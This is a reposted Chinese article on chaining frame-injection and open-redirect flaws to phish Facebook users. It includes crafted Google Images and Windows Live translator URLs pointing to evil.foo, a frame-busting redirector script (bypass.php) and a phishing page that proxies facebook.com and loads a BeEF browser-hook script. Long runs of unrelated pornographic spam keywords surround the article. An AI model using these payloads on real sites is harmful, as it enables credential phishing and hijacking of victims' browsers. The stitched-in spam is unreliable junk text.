精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

從框架注入漏洞到非法重定向

安全 應(yīng)用安全
一個(gè)框架注入攻擊是一個(gè)所有基于GUI的瀏覽器攻擊,它包括任何代碼如JavaScript,VBScript(ActivX),Flash,AJAX(html+js+py)。代碼被注入是由于腳本沒有對它們正確驗(yàn)證。

一、框架注入漏洞的定義,描述:

定義:

一個(gè)框架注入攻擊是一個(gè)所有基于GUI的瀏覽器攻擊,它包括任何代碼如JavaScript,VBScript(ActivX),Flash,AJAX(html+js+py)。代碼被注入是由于腳本沒有對它們正確驗(yàn)證。

框架弱點(diǎn)的注入攻擊,盡管有些人可能會(huì)認(rèn)為它們與HTML注入/跨站腳本是同類,我在此告訴你:“它們是不一樣的。”

這是為什么:

* 沒有必要注入特殊控制字符,如尖括號(hào)(HTMLi/XSS)

* HTMLi/XSS 過濾慣常的程序不會(huì)對項(xiàng)目內(nèi)注入,因?yàn)槲覀冎恍枰迦胍粋€(gè)URL中的非審查的參數(shù)。

最好的解釋方法就是舉一個(gè)例子。大多數(shù)框架注入的問題都發(fā)生在Web應(yīng)用程序中,因?yàn)閯?dòng)態(tài)框架/iframe中沒有足夠的實(shí)施過濾。例如, 我們的目標(biāo)有以下網(wǎng)址:

https://www.***.com /index.php?targeturl=/contact.php

我們的意圖是要發(fā)動(dòng)釣魚攻擊篡改的targeturl參數(shù)。我們的目標(biāo)是是插入第三方網(wǎng)頁,根據(jù)我們的控制,而不是原來的聯(lián)系網(wǎng)頁:

https://www.victim.foo/index.php?targeturl=http://evil.foo/login.php

注:我們可以編碼惡意pishing鏈接到十六進(jìn)制值,在此文章內(nèi)我們沒有使用。

二、針對網(wǎng)址作為有效載荷的描述:

這種技術(shù)只工作在受害者已將您加入他的朋友清單內(nèi),如果Facebook的cookie數(shù)據(jù)儲(chǔ)存在瀏覽器中,合法的框架注入對Facebook的組成輸入一個(gè)url上的網(wǎng)頁并命名為sharer.php。在Facebook中你將會(huì)看到,如果聯(lián)系人在線或不接受時(shí),他的朋友或如果他的個(gè)人資料是公開的。黑客將嘗試添加您并獲得關(guān)于您的信息。在Facebook會(huì)建議您不要讓每一個(gè)不被信任的聯(lián)系人加入您,因?yàn)樗梢試L試破解你的帳戶,如發(fā)生給你一個(gè)惡意鏈接。

這種攻擊如何工作?

這兒是一個(gè)小的代碼,可以使用Facebook保護(hù)“合法”鏈接注入facebook.com/sharer.php。

/--------------------------------------\ /------\

|http:// | |share |

\--------------------------------------/ \------/

使用Google或Live搜索框注入作為有效載荷的攻擊:

現(xiàn)在可以使用我們的惡意智能劫持這個(gè)。

“合法”框架注入,我們將使用一個(gè)值得“信賴”的網(wǎng)站,bypass.php源代碼是我們的惡意重定向腳本,這將是解釋下面的內(nèi)容。

The source code of bypass.php is my malicious redirector script, it will be explained later in the paper.

Google圖像框架注入

http://www.google.fr/imgres?imgurl=http://fake_url&imgrefurl=http://evil.foo/bypass.php

Windows live 翻譯框架注入

http://www.windowslivetranslator.com/BV.aspx?ref=Internal#http://www.windowslivetranslator.com/bv.aspx?mkt=fr-FR&dl=fr&lp=en_fr&a=http://evil.foo/bypass.php

三、重定向描述 :

重定向漏洞允許一個(gè)邪惡的用戶對一個(gè)網(wǎng)站重定向給受害者。主要攻擊媒介的這種脆弱性是pishing。只有在遠(yuǎn)程Web服務(wù)器的權(quán)限可以重定向漏洞使用惡意腳本php,javascript, vbscript ,ajax (worm)。

最常見的攻擊媒介是體現(xiàn)在雙重網(wǎng)址中:

http://site.com/redirect?r=http://malicious_website.com

四、利用方式,結(jié)合重定向框架注入vulnz:

先進(jìn)的重定向和框架注入組合攻擊:

/-----------/ /-----------/ /-----------/ /-----------/ /-----------/

|facebook ---| google ---| bypass.php|---| login.php ---| b e e f :

\-----------\ \-----------\ \-----------\ \-----------\ \-----------\

Facebook的sharer.php的輸入源可能看起來像這樣的腳本:

#########################################################################

<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN"

"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<title> Welcome in my-site-is-not-secure-now.w00t</title>

</head>

<frameset rows="*" cols="110,*" frameborder="NO" border="0" framespacing="0">

<frame src="navigation.htm" name="navigation" frameborder="yes" scrolling=""NO"

bordercolor="#0000CC" id="navigation">

<frameset rows="98,*" cols="*" framespacing="0" frameborder="NO" border="0" >

<frame src="en_tete.htm" name="en-tete" frameborder="yes" scrolling="NO"

bordercolor="#000000" id="en-tete">

<frame src="<?php

//secure code

if(isset($_GET['iframe']))

{

$allowUrls = array("http://www.google.fr/imgres?imgurl=http://fake_url&imgrefurl=http://evil.foo/bypass.php");

if(in_array($_GET['iframe'], $allowUrls))

echo $_GET['iframe']; // 如果IFRAME中允許有一個(gè)網(wǎng)址

else // 為了顯示主頁(或一個(gè)錯(cuò)誤頁面)

echo "accueil.htm";

}

else // !!!

echo "accueil.htm";

?>" name="corps" scrolling="auto" id="corps">

</frameset>

</frameset><noframes>No frames :(</noframes>

</html>

#########################################################################

在Facebook中變換惡意網(wǎng)址鏈接像這樣(sharer.php script):

http://www.facebook.com/ext/share.php?sid=501337&h=Crew&u=p3lo

和上面的鏈接Facebook的概況出現(xiàn)像這樣:

&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

圖片搜索結(jié)果

http://www.google.fr/imgres?imgurl=http://fake_url...

&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

現(xiàn)在來看看我的成批輸出轉(zhuǎn)換程序(PoC)重定向腳本(bypass.php):

###########################################################################

<head>

<meta http-equiv="Content-Language" content="it">

<SCRIPT LANGUAGE="JavaScript">

if (top.frames.length!=0) top.location=self.document.location;

</SCRIPT>

<title>fb redirector PoC by Czy</title>

</head>

<body bgcolor="#99FF66">

第一個(gè)腳本包含在head,允許殺死第一個(gè)框架的有效載荷,URL重定向到self.document.location。

第二個(gè)腳本允許重定向我的網(wǎng)頁上,以先進(jìn)的pishing頁面。

<br>

<br><br>

</body>

<br><br><script>document.location="http://evil.foo/login.php";</script><br>

###############################################################################

這是先進(jìn)重定向pishing頁面的來源 (login.php):

###############################################################################

<?php

//by Czy

$referer=”http://www.facebook.com/”;

// spoofing FireFox 2.0

$useragent=”Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1?;

$ch = curl_init();

curl_setopt ($ch, CURLOPT_URL, "http://www.facebook.com/");

curl_setopt ($ch, CURLOPT_HEADER, 0);

curl_setopt($ch, CURLOPT_USERAGENT, $useragent);

curl_setopt($ch, CURLOPT_REFERER, $referer);

curl_exec ($ch);

curl_close ($ch);

?>

<script src=”http://beefsite/beef/hook/beefmagic.js.php”></script>

###############################################################################

五、尾聲:

經(jīng)過長期時(shí)刻的研究,我認(rèn)為最好的方式來糾正這些漏洞是保證用戶離開該網(wǎng)頁和網(wǎng)站域名的重定向頁面。

責(zé)任編輯:藍(lán)雨淚 來源: 紅黑聯(lián)盟
相關(guān)推薦

2017-01-04 13:42:35

MINIFILTER文件重定向源碼

2010-12-14 15:07:15

ICMP路由重定向

2020-11-18 09:29:06

NginxHTTPHTTPS

2012-11-05 10:01:18

Chrome

2011-08-02 09:35:03

Chrome瀏覽器重定向

2023-08-07 10:17:20

AI域名ChatGPT

2020-12-09 11:10:12

shellLinux管道

2020-07-27 07:41:23

Linux重定向數(shù)據(jù)流

2010-12-31 13:35:25

文件夾重定向

2020-10-14 09:44:52

漏洞

2013-04-19 10:56:54

2022-11-17 08:40:14

Linux輸出錯(cuò)誤重定向

2020-09-29 10:44:51

漏洞

2017-01-19 19:14:20

Linux重定向命令

2010-03-09 16:11:59

Linux重定向

2010-04-20 15:25:12

Unix操作系統(tǒng)

2010-05-04 14:42:33

Unix操作系統(tǒng)

2009-12-25 16:21:41

shell命令

2011-06-15 14:33:13

2009-11-23 18:39:17

PHP重定向
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)

一区二区三区| 黄色成人一级片| 91av精品| 亚洲激情视频在线播放| 北条麻妃在线视频| 岛国中文字幕在线| jlzzjlzz亚洲日本少妇| 国产精品69久久久久| 国产精品成人69xxx免费视频 | 亚洲国产人成综合网站| 欧美亚洲爱爱另类综合| 国产成人av免费看| 久久久天天操| 久久久久久国产精品久久| 卡一卡二卡三在线观看| 999精品视频在这里| 在线视频欧美区| 免费看欧美黑人毛片| av亚洲在线| av亚洲精华国产精华| 成人做爰www免费看视频网站| 日本韩国欧美中文字幕| 亚洲成av人片乱码色午夜| 亚洲美女黄色片| 日本精品一二三区| 中文字幕系列一区| 欧美性猛交xxxx偷拍洗澡| av一区二区三区免费观看| 亚洲1卡2卡3卡4卡乱码精品| 久久综合色婷婷| 国产精品免费区二区三区观看| 国产精品久久久久久免费| 日韩精品一级中文字幕精品视频免费观看 | 麻豆成人av在线| 欧美在线亚洲一区| 日本少妇全体裸体洗澡| 欧美午夜一区| 色综合色综合网色综合| h色网站在线观看| 色欧美自拍视频| 一区二区成人精品| 一道本在线观看| 日韩精品免费一区二区三区竹菊| 精品久久国产字幕高潮| 91人妻一区二区三区| 国产精品日本一区二区三区在线| 欧美日韩卡一卡二| 久久久久久久久久久久91| 日本欧美韩国| 欧美私模裸体表演在线观看| 久久精品视频91| gogo亚洲高清大胆美女人体| 色哟哟一区二区三区| 超碰网在线观看| 国产超碰精品| 欧美视频在线一区二区三区 | 亚洲三级免费电影| 樱空桃在线播放| 超碰porn在线| 亚洲影视在线观看| 欧美不卡在线播放| 在线日韩影院| 欧美亚洲动漫精品| 久久久精品高清| 综合激情五月婷婷| 亚洲精品720p| 久久视频精品在线观看| 青青草国产免费一区二区下载| 中文字幕日韩有码| xxxx日本少妇| 国产精品地址| 欧洲成人在线视频| 在线播放国产一区| 国产成人亚洲精品青草天美 | 欧美日韩高清| 操91在线视频| 欧美福利视频一区二区| 日韩成人dvd| 成人一区二区电影| 色呦呦中文字幕| 日本一区二区三区免费乱视频| 中文字幕超清在线免费观看| 福利网站在线观看| 色婷婷综合久久久| 99999精品| 亚洲精品播放| 久久久91精品国产| 91在线看视频| 久久99精品久久久久久| 国产高清自拍99| 成年人在线观看| 亚洲激情网站免费观看| 久草青青在线观看| 91精品福利观看| 日韩精品高清在线观看| 三级黄色在线观看| 一区二区黄色| 91在线色戒在线| 日韩av成人| 亚洲另类在线制服丝袜| 日韩av在线综合| 色妞ww精品视频7777| 亚洲人成电影在线观看天堂色| 婷婷伊人五月天| 亚洲欧美日本视频在线观看| 91欧美日韩一区| 国产中文字幕在线观看| 亚洲国产日日夜夜| 在线不卡一区二区三区| 伊人精品一区| 久久欧美在线电影| 国产精品毛片一区视频播| 26uuu精品一区二区在线观看| 国产人妻互换一区二区| 国产精品伦一区二区| 日韩大陆毛片av| 久久免费小视频| 国产又粗又猛又爽又黄91精品| 欧美日韩一区在线播放 | 粉嫩老牛aⅴ一区二区三区| 亚洲一区二区在线视频观看| 亚洲午夜久久| 91av视频在线| 日韩一区二区三区在线观看视频| 亚洲天堂2014| 福利视频999| 青青草原综合久久大伊人精品| 欧美一区二区三区精品电影| 欧美一级淫片免费视频魅影视频| 亚洲激情一二三区| 手机av在线网站| 97精品国产| 国产欧美一区二区三区在线看| 国产在线三区| 色综合一个色综合亚洲| 玖草视频在线观看| 国产精品v亚洲精品v日韩精品| 91亚洲精品视频| 蜜芽在线免费观看| 欧美人动与zoxxxx乱| 国产wwwwxxxx| 九九**精品视频免费播放| 亚洲人线精品午夜| 欧美丰满少妇人妻精品| 欧美日韩亚洲一区二区三区在线| 成人中文字幕在线观看| 日本电影全部在线观看网站视频| 91成人免费在线视频| 蜜桃av免费看| 日韩中文字幕91| 视频一区在线免费观看| 外国电影一区二区| 日韩中文娱乐网| 91精品视频免费在线观看| 国产精品毛片a∨一区二区三区| 8x8x最新地址| 999国产精品视频| 91久久精品国产91久久| 色yeye免费人成网站在线观看| 日韩欧美在线网站| 久视频在线观看| 成人h版在线观看| 精品这里只有精品| av在线不卡免费观看| 国产精品免费久久久| 日本不卡视频| 日韩免费高清视频| 亚洲另类欧美日韩| 中文字幕电影一区| 国产欧美精品一二三| 黄色综合网站| 欧美视频小说| 在线观看欧美| 国产69精品99久久久久久宅男| 日中文字幕在线| 欧美日韩成人综合天天影院| 麻豆明星ai换脸视频| 成人精品免费看| 亚洲精品高清无码视频| 久久精品影视| 久久av一区二区三区亚洲| 主播大秀视频在线观看一区二区| 精品精品国产国产自在线| 人成网站在线观看| 欧美亚洲一区二区在线| 久久久久亚洲AV成人| 91浏览器在线视频| 一级淫片在线观看| 国产精品久久久久久久免费软件| 亚洲激情啪啪| 国产精品久av福利在线观看| 国产精品久久久久久久久久小说| 婷婷色在线播放| 国产亚洲精品美女久久久| 亚洲AV无码精品国产| 色诱视频网站一区| 国产亚洲成人精品| 国产精品每日更新| a视频免费观看| 国产专区综合网| 精品久久久久久久免费人妻| 欧美日本不卡| 亚洲制服中文| 亚洲区小说区图片区qvod按摩| 91影院在线免费观看视频| 肉色欧美久久久久久久免费看| 欧美精品少妇videofree| 国产高清自拍视频在线观看| 亚洲电影av在线| 国产精品高潮呻吟AV无码| 欧美性videos高清精品| 免费在线一级片| 国产精品毛片久久久久久| 美女洗澡无遮挡| 99久久亚洲一区二区三区青草| 911av视频| 久久99精品久久只有精品| 青青在线免费观看视频| 99热这里只有精品8| 影音先锋成人资源网站| 日本欧美肥老太交大片| 欧美国产视频在线观看| 狼人天天伊人久久| 成人动漫视频在线观看完整版| 欧美综合社区国产| 国产精品老牛影院在线观看| 91精品产国品一二三产区| 韩国视频理论视频久久| 黑人玩欧美人三根一起进| 久久婷婷国产麻豆91天堂| 男人天堂久久久| 最新国产成人av网站网址麻豆| 国产www.大片在线| 亚洲天堂av女优| 国产在线观看高清视频| 亚洲视频第一页| 国产三级电影在线观看| 亚洲欧洲av一区二区| 日韩资源在线| 亚洲人成网7777777国产| 亚洲av片在线观看| 亚洲精品视频中文字幕| 日本一区高清| 亚洲色图色老头| 国产在线黄色| 中文字幕日韩在线播放| 日本在线免费中文字幕| 久久视频精品在线| 国产在线1区| 精品中文字幕乱| 欧美xxxx性xxxxx高清| 精品中文字幕在线| 国产蜜臀一区二区打屁股调教| 国产做受69高潮| 性欧美freesex顶级少妇| 日本成熟性欧美| 国产成人福利夜色影视| 国产欧美日韩免费看aⅴ视频| 9999精品| 成人av片网址| 神马香蕉久久| 色就是色欧美| 亚洲精品一区二区妖精| 国产青草视频在线观看| 国产精品久久久久久久久久妞妞 | 午夜欧美理论片| av网站手机在线观看| 亚洲影院免费| 国产三级三级看三级| 黄页网站大全一区二区| 一级日本黄色片| 99精品视频一区二区| 99久久人妻无码精品系列| 亚洲桃色在线一区| 日韩特黄一级片| 欧美性极品少妇| 国产乱人乱偷精品视频| 亚洲国产欧美久久| 自拍视频在线免费观看| 久久久久久久久国产精品| 欧美成人精品一区二区男人小说| 国产日韩欧美在线视频观看| 粉嫩的18在线观看极品精品| 日韩高清国产精品| 欧美成人嫩草网站| 久久久久人妻精品一区三寸| 激情五月婷婷综合| 在线 丝袜 欧美 日韩 制服| 亚洲欧洲日韩一区二区三区| 圆产精品久久久久久久久久久| 欧美综合一区二区三区| 亚洲va久久久噜噜噜无码久久| 亚洲欧美综合另类中字| 天堂av资源在线观看| 日韩女优人人人人射在线视频| 精品久久久久久久久久岛国gif| 久久精品美女| 欧美黄免费看| 网站一区二区三区| 99久久免费精品高清特色大片| 午夜黄色福利视频| 欧美日韩国产精品一区| 国产三区在线播放| 在线亚洲国产精品网| 国产福利电影在线播放| 91手机在线观看| 精品视频亚洲| 免费av手机在线观看| 国产精品自拍在线| 白白色免费视频| 午夜视频久久久久久| 国内老熟妇对白xxxxhd| 中文字幕亚洲激情| 偷拍精品精品一区二区三区| 国产一区二区三区免费不卡| 亚洲色图二区| 污污的网站免费| 欧美国产97人人爽人人喊| 国产情侣自拍av| 精品国产人成亚洲区| 在线免费观看的av| 成人做爽爽免费视频| 日韩一区二区三区免费播放| 不卡影院一区二区| 2020日本不卡一区二区视频| 国产在线观看99| 欧美第一区第二区| 91高清在线观看视频| 亚洲xxxx视频| 牛牛国产精品| 国产三级精品三级在线| 中文字幕av一区二区三区免费看| 亚洲欧美一二三区| 亚洲摸下面视频| 原纱央莉成人av片| 女女同性女同一区二区三区91| 亚洲美女一区| 人妻无码中文久久久久专区| 婷婷丁香激情综合| 蜜桃视频久久一区免费观看入口| 欧美激情免费在线| 高潮久久久久久久久久久久久久 | 精品久久人人做人人爱| 午夜激情在线| av电影成人| 亚洲精品国产日韩| 日韩中文字幕电影| 日本高清不卡在线观看| 国产鲁鲁视频在线观看免费| 国产精品高潮呻吟久久av黑人| 日韩.com| 国产老头和老头xxxx×| 亚洲一区二区三区视频在线| 日本黄色三级视频| 日本精品性网站在线观看| 精品日韩免费| 亚洲免费黄色录像| 一区二区三区日韩欧美| 欧美自拍偷拍第一页| 欧美专区日韩视频| 日韩免费久久| 性色av浪潮av| 岛国av一区二区在线在线观看| 久久精品国产亚洲a∨麻豆| 成人乱人伦精品视频在线观看| 国产一区二区三区自拍| 日韩 中文字幕| 欧美色欧美亚洲另类二区| 18视频在线观看| 精品视频免费观看| 免费在线欧美视频| 免费视频一二三区| 国产丝袜一区视频在线观看 | 国产精品一区二区在线观看| 久久国产欧美| 男人操女人的视频网站| 亚洲国产精品中文| 亚洲电影有码| 欧美国产日韩激情| 国产日韩欧美不卡| www.色视频| 日韩免费在线视频| 中文字幕av亚洲精品一部二部| 在线观看国产免费视频| 欧美视频中文一区二区三区在线观看| 免费污视频在线观看| 日本视频一区二区在线观看| 国产精品综合久久| 五月婷婷激情视频| 九九精品视频在线观看| 九九亚洲视频| 国产成人av片| 欧美亚洲综合色| www.youjizz.com在线| 中文字幕色一区二区| 99亚偷拍自图区亚洲| 国产精品无码专区av免费播放| 人人爽久久涩噜噜噜网站| 欧美区国产区| 成人免费精品动漫网站|